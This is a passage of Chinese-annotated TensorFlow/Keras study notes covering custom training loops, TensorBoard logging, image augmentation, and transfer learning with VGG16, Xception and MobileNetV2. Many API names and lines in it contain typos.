dataset = tf.data.Dataset.from_tensor_slices((x, y)) dataset = dataset.shuffle(10000).batch(32) 2)定义模型结构 model = tf.keras.Sequential([...]) 3)选择optimizer optimizer = tf.keras.optimizer.Adam() 4)计算loss y_ = model(x) loss = loss_func(y,y_) 5)计算grads with tf.GradientTape() as t grads = t.gradient(loss, model.trainable_variables) 6)optimizer按照grads方向更新参数 optimizer.apply_gradients(zip(grads, model.trainable_variables)) 7)按batch进行训练 重复 5)和 6) ''' # 生成数据集 (train_image, train_labels), (test_image, test_labels) = tf.keras.datasets.mnist.load_data() # 训练集 train_image = tf.expand_dims(train_image, -1) #-1表示扩增的最后一个维度,由于使用CNN因此需要扩增数据维度 train_image = tf.cast(train_image/255, tf.float32) #需要float类型才能做梯度运算 train_labels = tf.cast(train_labels, tf.int64) dataset = tf.data.Dataset.from_tensor_slices((train_image, train_labels)) dataset = dataset.shuffle(10000).batch(32) # 默认repeat(1);如果使用fit方法的话,需添加repeat(),无限循环 # 测试集 test_image = tf.expand_dims(test_image, -1) test_image = tf.cast(test_image/255, tf.float32) test_labels = tf.cast(test_labels, tf.int64) test_dataset = tf.data.Dataset.from_tensor_slices((test_image, test_labels)) test_dataset = test_dataset.batch(32) # 模型构建 model = tf.keras.Sequential([ tf.keras.layers.Conv2D(16,[3,3], activation='relu',input_shape=(28,28,1)), #任意图片大小:input_shape=(None,None,1) tf.keras.layers.Conv2D(16,[3,3], activation='relu'), tf.keras.layser.GlobalMaxPooling2D(), #GlobalAveragePooling2D() tf.keras.layers.Dense(10, activation='softmax')]) # 自定义模型优化(不使用compile) optimizer = tf.keras.optimizer.Adam(lr=0.01) #初始化优化器 #loss_func = tf.keras.losses.sparse_categorial_crossentropy(y_true, y_pred, from_logits = False) #是否从上层Dense激活,如果是则True,否则False # or loss_func = tf.keras.losses.SparseCategorialCrossentropy(from_logits=False) #返回一个方法,loss_func(y, y_) features, labels = next(iter(dataset)) #按照batch迭代返回数据 predictions = model(features) #计算预测结果 print(predictions.shape) # (32, 10) tf.argmax(predictions, axis=1) #同np.argmax(), 返回预测概率最大的位置 # 计算loss def loss(model, x, y): y_ = model(x) # y_ = tf.argmax(y_, axis=1) # 不需要吗?不需要! loss = tf.keras.losses.SparseCategorialCrossentropy(from_logits=False)(y, y_) #if loss_func is SparseCategorialCrossentropy # loss = tf.keras.losses.sparse_categorial_crossentropy(y, y_, from_logits=False) #if loss_func is sparse_categorial_crossentropy return loss # 评估指标 train_loss = tf.keras.metrics.Mean('train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy') test_loss = tf.keras.metrics.Mean('test_loss') test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('test_accuracy') # 每个batch的训练 def train_step(model, images, labels): with tf.GradientTape() as t: predictions = model(images) loss_step = loss_func(labels, predictions) # loss_step = loss(model, images, labels) #计算loss grads = t.gradient(loss_step, model.trainable_variables) #计算loss相对模型变量的梯度 optimizer.apply_gradients(zip(grads, model.trainable_variables)) #使用grads更新模型变量,即优化过程 train_loss(loss_step) #计算平均loss,备注:在循环过程中会记录下每个Batch的loss train_accuracy(labels, predictions) #计算平均accuracy # 每个batch的预测(不用计算grads和optimizer) def test_step(model, images, labels): with tf.GradientTape() as t: pred = model(images) loss_step = loss_func(labels, pred) test_loss(loss_step) test_accuracy(labels, predictions) # 训练 def train(): for epoch in range(10): # 训练 for (batch, (images, labels)) in enumerate(dataset): train_step(model, images, labels) #every batch print('Epoch{} is finished. loss is {}, accuracy is {}.' \ .format(epoch, train_loss.result(), train_accuracy.result())) # 预测 for (batch, (images, labels)) in enumerate(test_dataset): test_step(model, images, labels) #every batch print('Epoch{} is finished. test_loss is {}, test_accuracy is {}.' \ .format(epoch, test_loss.result(), test_accuracy.result())) # 重制状态 train_loss.reset_states() train_accuracy.reset_states() test_loss.reset_states() test_accuracy.reset_states() train() #训练模型 #%% 评价指标汇总:tf.keras.metrics() m = tf.keras.metrics.Mean('acc') #返回计算acc的对象 print(m(10)) print(m(20)) print(m([30,40])) print(m.result().numpy()) #会保留之前的状态一起计算,返回均值25 m.reset_states() #重制状态 a = tf.keras.metrics.SparseCategoricalAccuracy('acc') a(labels, predictions) # 自动选择概率最大位置,并计算正确率 #%% tensorboard可视化(keras定义模型) import os import datetime (train_image, train_labels), (test_image, test_labels) = tf.keras.datasets.mnist.load_data() train_image = tf.expand_dims(train_image, -1) #-1表示扩增的最后一个维度,由于使用CNN因此需要扩增数据维度 train_image = tf.cast(train_image/255, tf.float32) #需要float类型才能做梯度运算 train_labels = tf.cast(train_labels, tf.int64) dataset = tf.data.Dataset.from_tensor_slices((train_image, train_labels)) dataset = dataset.shuffle(10000).repeat().batch(32) # 默认repeat(1);如果使用fit方法的话,需添加repeat(),无限循环 test_image = tf.expand_dims(test_image, -1) test_image = tf.cast(test_image/255, tf.float32) test_labels = tf.cast(test_labels, tf.int64) test_dataset = tf.data.Dataset.from_tensor_slices((test_image, test_labels)) test_dataset = test_dataset.batch(32) model = tf.keras.Sequential([ tf.keras.layers.Conv2D(16,[3,3], activation='relu',input_shape=(28,28,1)), #任意图片大小:input_shape=(None,None,1) tf.keras.layers.Conv2D(16,[3,3], activation='relu'), tf.keras.layser.GlobalMaxPooling2D(), #GlobalAveragePooling2D() tf.keras.layers.Dense(10, activation='softmax')]) model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.01), loss='sparse_categorical_crossentropy', metrics=['acc']) # tensorboard显示上述模型中定义的评估指标 log_dir = os.path.join('logs', datetime.datetime.now().strftime('%Y%m%d-%H%M%S')) tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) # tensorboard显示其他自定义指标 # 以学习速率为例,将LearningRateScheduler()传给model.fit() file_writer = tf.summary.create_file_writer(log_dir + '/lr') #创建文件编写器 file_writer.set_as_default() #将file_writer设置成默认文件编写器 def lr_sche(epoch): learning_rate = 0.2 if epoch > 5: learning_rate = 0.02 elif epoch > 10: learning_rate = 0.01 else: learning_rate = 0.005 tf.summary.scaler('leaning_rate', data=learning_rate, step=epoch) #收集learning_rate到默认的文件编写器(即file_writer) return learning_rate lr_callback = tf.keras.calllbacks.LearningRateScheduler(lr_sche) #创建lr的回调函数 model.fit(dataset, epochs=10, step_per_epoch=60000//128, validation_data=test_data, validation_step=10000/128, callbacks=[tensorboard_callback, lr_callback]) #%% 启动tensorboard # Jupter中启动tensorboard %load_ext tensorboard %matplotlib inline %tensorboard --logdir logs # 浏览器中启动tensorboard # 从终端输入:tensorboard --logdir logs #%% eager自定义训练中的tensorboard (train_image, train_labels), (test_image, test_labels) = tf.keras.datasets.mnist.load_data() train_image = tf.expand_dims(train_image, -1) #-1表示扩增的最后一个维度,由于使用CNN因此需要扩增数据维度 train_image = tf.cast(train_image/255, tf.float32) #需要float类型才能做梯度运算 train_labels = tf.cast(train_labels, tf.int64) dataset = tf.data.Dataset.from_tensor_slices((train_image, train_labels)) dataset = dataset.shuffle(10000).repeat().batch(32) # 默认repeat(1);如果使用fit方法的话,需添加repeat(),无限循环 test_image = tf.expand_dims(test_image, -1) test_image = tf.cast(test_image/255, tf.float32) test_labels = tf.cast(test_labels, tf.int64) test_dataset = tf.data.Dataset.from_tensor_slices((test_image, test_labels)) test_dataset = test_dataset.batch(32) model = tf.keras.Sequential([ tf.keras.layers.Conv2D(16,[3,3], activation='relu',input_shape=(28,28,1)), #任意图片大小:input_shape=(None,None,1) tf.keras.layers.Conv2D(16,[3,3], activation='relu'), tf.keras.layser.GlobalMaxPooling2D(), #GlobalAveragePooling2D() tf.keras.layers.Dense(10, activation='softmax')]) optimizer = tf.keras.optimizer.Adam(lr=0.01) #初始化优化器 loss_func = tf.keras.losses.SparseCategorialCrossentropy(from_logits=False) #返回一个方法,loss_func(y, y_) train_loss = tf.keras.metrics.Mean('train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy') test_loss = tf.keras.metrics.Mean('test_loss') test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('test_accuracy') def train_step(model, images, labels): with tf.GradientTape() as t: predictions = model(images) loss_step = loss_func(labels, predictions) grads = t.gradient(loss_step, model.trainable_variables) #计算loss相对模型变量的梯度 optimizer.apply_gradients(zip(grads, model.trainable_variables)) #使用grads更新模型变量,即优化过程 train_loss(loss_step) #计算平均loss,备注:在循环过程中会记录下每个Batch的loss train_accuracy(labels, predictions) #计算平均accuracy def test_step(model, images, labels): with tf.GradientTape() as t: pred = model(images) loss_step = loss_func(labels, pred) test_loss(loss_step) test_accuracy(labels, predictions) current_time = datetime.datetime.now().strftime('%Y%m%d-%H%M%S') train_log_dir = 'logs/gradient_tape/' + current_time + '/train' test_log_dir = 'logs/gradient_tape/' + current_time + '/test' train_writer = tf.summary.create_file_writer(train_log_dir) test_writer = tf.summary.create_file_writer(test_log_dir) def train(): for epoch in range(10): print('Epoch is {}'. format(epoch)) # 训练 for (batch, (images, labels)) in enumerate(dataset): train_step(model, images, labels) #every batch with train_writer.set_as_default(): tf.summary.scalar('loss', train_loss.result(), step=epoch) tf.summary.scalar('acc', train_accuracy.result(), step=epoch) print('train_end') # 预测 for (batch, (images, labels)) in enumerate(test_dataset): test_step(model, images, labels) #every batch with test_writer.set_as_default(): tf.summary.scalar('loss', test_loss.result(), step=epoch) tf.summary.scalar('acc', test_accuracy.result(), step=epoch) print('test_end') # 重制状态 train_loss.reset_states() train_accuracy.reset_states() test_loss.reset_states() test_accuracy.reset_states() #%% 猫狗数据自定义训练示例 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os # 1) reload data to tf.data # 图片处理 def load_preprocess_image(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (256, 256)) #转换所有图片大小相同 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 # image = tf.image.convert_image_dtype(image) #如果原数据不是float类型,会默认把数据做归一化;如果原数据是float类型,则不会进行归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label # 图片增强 # 针对训练数据进行增强:比如上下翻转、左右翻转、图片裁剪等 def load_preprocess_image_enhance(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (360, 360)) #转换所有图片大小相同 image = tf.image.random_crop(image, [256, 256, 3]) #讲360*360的图像随机裁剪为256*256 image = tf.image.random_flip_left_right(image) #左右翻转 image = tf.image.random_flip_up_down(image) #上下翻转 # image = tf.image.random_brigtness(image, 0.5) #随机改变亮度 # image = tf.image.random_contrast(image, 0, 1) #随机改变对比度 # image = tf.image.random_hue(image, max_delta=0.3) #随机改变颜色 # image = tf.image.random_saturation(image, lower=0.2, upper=1.0) #随机改变饱和度 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 # image = tf.image.convert_image_dtype(image) #如果原数据不是float类型,会默认把数据做归一化;如果原数据是float类型,则不会进行归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 # train数据进行数据增强 train_image_path = glob.glob('./train/*/*.jpg') # * is cat/ or dog/ train_image_label = [int(x.split('/')[2] == 'cats') for x in train_image_path] # 0-cat, 1-dog train_image_ds = tf.data.Dataset.from_tensor_slices((train_image_path, train_image_label)) #train_image_ds = train_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 train_image_ds = train_image_ds.map(load_preprocess_image_enhance, num_parallel_calls=AUTOTUNE) # 取出一张图片查看 for img, label in train_image_ds.take(1): plt.imshow(img) train_count = len(train_image_path) train_image_ds = train_image_ds.shuffle(train_count).batch(BATCH_SIZE) train_image_ds = train_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # test数据处理不需要增强 test_image_path = glob.glob('./test/*.jpg') test_image_label = [int(x.split('/')[2] == 'cats') for x in test_image_path] # 0-cat, 1-dog test_image_ds = tf.data.Dataset.from_tensor_slices((testimage_path, test_image_label)) test_image_ds = test_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 test_count = len(test_image_path) test_image_ds = test_image_ds.batch(BATCH_SIZE) test_image_ds = test_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # 按batch取出数据进行查看 imgs, labels = next(iter(train_image_ds)) print(imgs) #(32, 256, 256, 3) plt.imshow(imgs[0]) #显示图片 # 2) model construction model = keras.Sequential([ tf.keras.layers.Conv2D(64,(3,3),input_shape=(256,256,3), activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(128,(3,3),activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(1024,(3,3),activation='relu'), tf.keras.layers.GlobalAveragePooling2D(), #(None,1024) tf.keras.layers.Dense(256, activation='relu'), tf.keras.layers.Dense(1, activation='sigmoid') ]) model.summary() #pred = model(imags) #(32, 1) #y_ = np.array([p[0].numpy() for p in tf.cast(pred>0.5, tf.int32)]) # pred>0.5返回boolen值 #y = np.array([l[0].numpy() for l in labels]) # 3) define loss and optimizer ls = tf.keras.losses.BinaryCrossentropy(from_logits=True) optimizer = tf.keras.optimizer.Adam(lr=0.01) # 4) train define (for one batch) train_epoch_loss_avg = tf.keras.metrics.Mean('train_loss') train_accuracy = tf.keras.metrics.Accuracy('train_acc') def train_step(model, images, labels): with tf.GradientTape() at t: pred = model(images) loss_step = ls(labels, pred) grads = t.gradient(loss_step, model.trainable_variables) optimizer.apply_gradients(zip(grads, model.trainable_variables)) train_epoch_loss_avg(loss_step) train_accuracy(labels, tf.cast(pred>0.5, tf.int32)) # 5) test define (for one batch) test_epoch_loss_avg = tf.keras.metrics.Mean('test_loss') test_accuracy = tf.keras.metrics.Accuracy('test_acc') def test_step(model, images, labels): pred = model(images, training=False) # or # pred = model.predict(images) loss_step = ls(labels, pred) test_epoch_loss_avg(loss_step) test_accuracy(labels, tf.cast(pred>0.5, tf.int32)) # 6) model training and validation train_loss_results = [] train_acc_results = [] test_loss_results = [] test_acc_results = [] num_epochs = 30 for epoch in range(num_epochs): # train for (batch, (imgs_, labels_)) in train_image_ds: train_step(model, images=imgs_, labels=labels_) print('.', end='') print() train_loss_results.append(train_epoch_loss_avg.result()) train_acc_results.append(train_accuracy.result()) # test for (batch, (imgs_, labels_)) in test_image_ds: test_step(model, images=imgs_, labels=labels_) print('.', end='') print() test_loss_results.append(test_epoch_loss_avg.result()) test_acc_results.append(test_accuracy.result()) # print print('Epoch:{}, train_loss:{:.3f}, train_accuracy:{:.3f}, test_loss:{:.3f}, test_accuracy:{:.3f}'.\ format(epoch+1, train_epoch_loss_avg.result(), train_accuracy.result(), test_epoch_loss_avg.result(), test_accuracy.result())) # reset train_epoch_loss_avg.reset_states() train_accuracy.reset_states() test_epoch_loss_avg.reset_states() test_accuracy.reset_states() # 7) model optimization # 增加网络的深度(增加卷积层、全连接层),且避免过拟合(增加训练样本、添加batch normalization、添加dropout) # 类似VGG16模型: 2个64-conv2D + 2个128-conv2D + 3个256-conv2D + 3个512-conv2D + 3个512-conv2D model = keras.Sequential([ tf.keras.layers.Conv2D(64,(3,3),input_shape=(256,256,3), activation='relu'), tf.keras.layers.Batchnormalization(), # 放在卷积层后 tf.keras.layers.Conv2D(64,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(128,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(128,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(1,1),activation='relu'), #1*1卷积,用于提取channel tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(1,1),activation='relu'), #1*1卷积,用于提取channel tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.GlobalAveragePooling2D(), #(None,512) tf.keras.layers.Dense(4096, activation='relu'), #全连接层1 tf.keras.layers.Dense(4096, activation='relu'), #全连接层2 tf.keras.layers.Dense(1000, activation='relu'), #全连接层3 tf.keras.layers.Dense(1, activation='sigmoid') ]) model.summary() #%% 预训练模型的使用(迁移学习)- 猫狗数据集 # keras内置预训练网络,比如VGG16、VGG19、ResNet50、Inception v3、Xception等,参考 https://keras.io/zh/applications/ # ImageNet数据集:训练集120万、验证集5万、测试集10万 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os tf.test.is_gpu_avialble() #True is used GPU keras = tf.keras layers = tf.keras.layers # 图片处理 def load_preprocess_image(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (256, 256)) #转换所有图片大小相同 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 # train数据进行数据增强 train_image_path = glob.glob('./train/*/*.jpg') # * is cat/ or dog/ train_image_label = [int(x.split('/')[2] == 'cats') for x in train_image_path] # 0-cat, 1-dog train_image_ds = tf.data.Dataset.from_tensor_slices((train_image_path, train_image_label)) train_image_ds = train_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) train_count = len(train_image_path) train_image_ds = train_image_ds.shuffle(train_count).batch(BATCH_SIZE) train_image_ds = train_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # test数据处理不需要增强 test_image_path = glob.glob('./test/*.jpg') test_image_label = [int(x.split('/')[2] == 'cats') for x in test_image_path] # 0-cat, 1-dog test_image_ds = tf.data.Dataset.from_tensor_slices((testimage_path, test_image_label)) test_image_ds = test_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 test_count = len(test_image_path) test_image_ds = test_image_ds.batch(BATCH_SIZE) test_image_ds = test_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # 按batch取出数据进行查看 imgs, labels = next(iter(train_image_ds)) print(imgs) #(32, 256, 256, 3) plt.imshow(imgs[0]) #显示图片 # 使用VGG预训练网络 covn_base = keras.applications.VGG16(weight='imagenet', #weight=None 不使用预训练模型网络参数 include_top=False) #include_top=False 不使用顶层全连接层的参数 #权重文件存放:/Users/tinghai/.keras/models covn_base.summary() # 在预训练模型基础上,添加顶层全连接层和输出层 model = keras.Sequential() model.add(covn_base) model.add(layers.GlobalAveragePooling2D()) #类似于Flatten() model.add(layers.Dense(512, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() # 冻结预训练模型的所有参数 covn_base.trainable = False model.summary() #可训练的参数明显减少 # 训练新添加的分类层参数 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss='binary_corssentropy', metrics=['acc']) history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=12, validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) #%% Fine-tune # 冻结预训练模型底层卷积层参数、共同训练顶层卷积层和新添加的顶层全连接层参数 # 步骤(1-3与上述相同): # 1)在预训练模型上添加顶层全连接层和输出层 # 2)冻结预训练模型的所有参数 # 3)训练新添加的分类层参数 # 4)解冻预训练模型的部分参数(比如靠上的几层) # 5)联合训练解冻的卷积层和新添加的自定义层 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os tf.test.is_gpu_avialble() #True is used GPU keras = tf.keras layers = tf.keras.layers # 图片处理 def load_preprocess_image(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (256, 256)) #转换所有图片大小相同 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 # train数据进行数据增强 train_image_path = glob.glob('./train/*/*.jpg') # * is cat/ or dog/ train_image_label = [int(x.split('/')[2] == 'cats') for x in train_image_path] # 0-cat, 1-dog train_image_ds = tf.data.Dataset.from_tensor_slices((train_image_path, train_image_label)) train_image_ds = train_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) train_count = len(train_image_path) train_image_ds = train_image_ds.shuffle(train_count).batch(BATCH_SIZE) train_image_ds = train_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # test数据处理不需要增强 test_image_path = glob.glob('./test/*.jpg') test_image_label = [int(x.split('/')[2] == 'cats') for x in test_image_path] # 0-cat, 1-dog test_image_ds = tf.data.Dataset.from_tensor_slices((testimage_path, test_image_label)) test_image_ds = test_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 test_count = len(test_image_path) test_image_ds = test_image_ds.batch(BATCH_SIZE) test_image_ds = test_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # 按batch取出数据进行查看 imgs, labels = next(iter(train_image_ds)) print(imgs) #(32, 256, 256, 3) plt.imshow(imgs[0]) #显示图片 # 1)在预训练模型基础上,添加顶层全连接层和输出层 covn_base = keras.applications.VGG16(weight='imagenet', #weight=None 不使用预训练模型网络参数 include_top=False) #include_top=False 不使用顶层全连接层的参数 #权重文件存放:/Users/tinghai/.keras/models covn_base.summary() model = keras.Sequential() model.add(covn_base) model.add(layers.GlobalAveragePooling2D()) #类似于Flatten() model.add(layers.Dense(512, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() # 2)冻结预训练模型的所有参数 covn_base.trainable = False model.summary() #可训练的参数明显减少 # 3)训练新添加的分类层参数 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss='binary_corssentropy', metrics=['acc']) history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=12, validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) # 4)解冻预训练模型的部分参数 covn_base.trainable = True len(covn_base.layers) #预训练模型一共19层 fine_tune_at = -3 for layer in covn_base.layers[:fine_tune_at]: layer.trainable = False #除去后3层,其余都是不可训练的 # 5)联合训练 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005/10), #需要使用更小的lr loss='binary_corssentropy', metrics=['acc']) initial_epochs = 12 fine_tune_epochs = 10 total_epochs = initial_epochs + fine_tune_epochs history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=total_epochs, initial_epoch = initial_epochs, #新增参数 validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) #%% Xception预训练模型 # Xception默认图片大小为299*299*3 tf.keras.applications.xception.Xception( include_top=True, #是否包含顶层全连接层 weigths='imagenet', #加载imagenet数据集上预训练的权重 input_tensor=None, input_shape=None, #仅当include_top=False时有效,可输入自定义大小的图片,比如256*256*3 pooling=None, #avg or max => 输出为(None, dim), 而None => 输出为(None,length,width,channel) classes=1000) # 1)在Xception预训练模型上添加自定义层,进行训练 covn_base = tf.keras.applications.xception.Xception(include_top=False, weigths='imagenet', input_shape=(256,256,3), pooling='avg') covn_base.trainable = False covn_base.summary() model = keras.Sequential() model.add(covn_base) #model.add(layers.GlobalAveragePooling2D()) #由于Xception已经使用了pooling='avg' model.add(layers.Dense(512, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss='binary_corssentropy', metrics=['acc']) initial_epochs = 5 history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=initial_epochs, validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) # 2)解冻Xception的部分参数,结合新增自定义层进行fine-tune训练 covn_base.trainable = True len(covn_base.layers) #预训练模型一共133层 fine_tune_at = -33 for layer in covn_base.layers[:fine_tune_at]: layer.trainable = False #除去后33层,其余都是不可训练的 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005/10), #需要使用更小的lr loss='binary_corssentropy', metrics=['acc']) fine_tune_epochs = 5 total_epochs = initial_epochs + fine_tune_epochs history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=total_epochs, initial_epoch = initial_epochs, #新增参数 validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) #%% 多输出模型 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os import pathlib import random # 获取图片路径 data_dir = './dateset/moc' data_root = pathlib.Path(data_dir) for item in data_root.iterdir(): print(item) all_image_path = list(data_root.glob('*/*')) #获取给定路径下的所有文件路径 all_image_path = [str(x) for x in all_image_path] random.shuffle(all_image_path) image_count = len(all_image_path) #2525 # 获取样本标签 label_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir()) #获取给定路径下的所有一级文件夹名称,eg 'red_jeans' color_label_names = set(name.split('_')[0] for name in label_names) #3 colors item_label_names = set(name.split('_')[1] for name in label_names) #4 items color_label_to_index = dict((name, index) for index, name in enumerate(color_label_names)) # {'black':0, 'red':1, 'blue':2} item_label_to_index = dict((name, index) for index, name in enumerate(item_label_names)) # all_image_labels = [pathlib.Path(p).parent.name for p in all_image_path] #获取每个样本的标签: 0/1 color_labels = [color_label_to_index[p.split('_')[0]] for p in all_image_labels] item_labels = [item_label_to_index[p.split('_')[1]] for p in all_image_labels] color_index_to_label = dict(v,k for k,v in color_label_to_index.items) item_index_to_label = dict(v,k for k,v in item_label_to_index.items) # 随机取出图像查看 import Ipython.display as display for n in range(3): image_index = random.choice(range(len(all_image_path))) display.display(display.Image(all_image_path[image_index])) print(all_image_label[image_index]) # plt.imshow():针对解码的tensor,显示图片 # display.display(display.Image(image_path)):针对给定图片路径,显示图片 # 使用tensorflow读取图片 def load_preprosess_image(img_path): img_raw = tf.io.read_file(img_path) #tf读取图片 img_tensor = tf.image.decode_jpeg(img_raw, channels=3) #针对jpeg格式图像解码 img_tensor = tf.image.resize(img_tensor, (224,224)) #图像可能发生变形,使用resize可以使得解析后的tensor具备shape print(img_tensor.shape) #[256,256,3] print(img_tensor.dtype) #tf.uint8 img_tensor = tf.cast(img_tensor, tf.float32) #转换 tf.uint8 为 tf.float32 img_tensor = img_tensor/255.0 #标准化到[0,1]之间 img_tensor = 2*img_tensor-1 #归一化到[-1,1]之间 img_numpy = img_tensor.numpy() #tensor转换成numpy print(img_numpy.max(), img_numpy.min()) return img_tensor # 针对解码的tensor,生成图片 plt.imshow((load_preprosess_image(all_image_path[100])+1)/2) #恢复图片取值范围为[0,1],传给imshow显示 plt.xlabel(all_image_labels[100]) # 生成image-dataset和label-dataset BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 path_ds = tf.data.Dataset.from_tensor_slices(all_image_path) image_ds = path_ds.map(load_preprosess_image, num_parallel_calls=AUTOTUNE) label_ds = tf.data.Dataset.from_tensor_slices((color_labels,item_labels)) print(image_ds.shape) print(label_ds.shape) for label in label_ds.take(2): print(label[0].numpy(), label[1].numpy()) for img in image_ds.take(2): plt.imshow(img) image_label_ds = tf.data.Dataset.zip((image_ds, label_ds)) # 划分训练集和测试集 test_count = int(image_count * 0.2) train_count = image_count - test_count train_data = image_label_ds.skip(test_count) test_data = image_label_ds.take(test_count) train_count = len(train_data) train_data = train_data.shuffle(train_count).batch(BATCH_SIZE) train_data = train_data.prefetch(buffer_size=AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 test_data = test_data.batch(BATCH_SIZE) # model construction mobile_net = tf.keras.applications.MobileNetV2(include_top=False, weigths=None, #仅使用MobileNetV2的架构,没有使用权重 input_shape=(224,224,3)) inputs = tf.keras.Input(shape=(224,224,3)) x = mobile_net(inputs) print(x.get_shape) #(None,7,7,1280) x = tf.keras.layers.GlobalAveragePooling2D()(x) #or x = tf.keras.layers.Flatten()(x) print(x.get_shape) #(None,1280) x1 = tf.keras.layers.Dense(1024, activation='relu')(x) x2 = tf.keras.layers.Dense(1024, activation='relu')(x) out_color = tf.keras.layers.Dense(len(color_label_names), activation='softmax', name='out_color')(x1) out_item = tf.keras.layers.Dense(len(item_label_names), activation='softmax', name='out_item')(x2) model = tf.keras.Model(inputs=inputs, 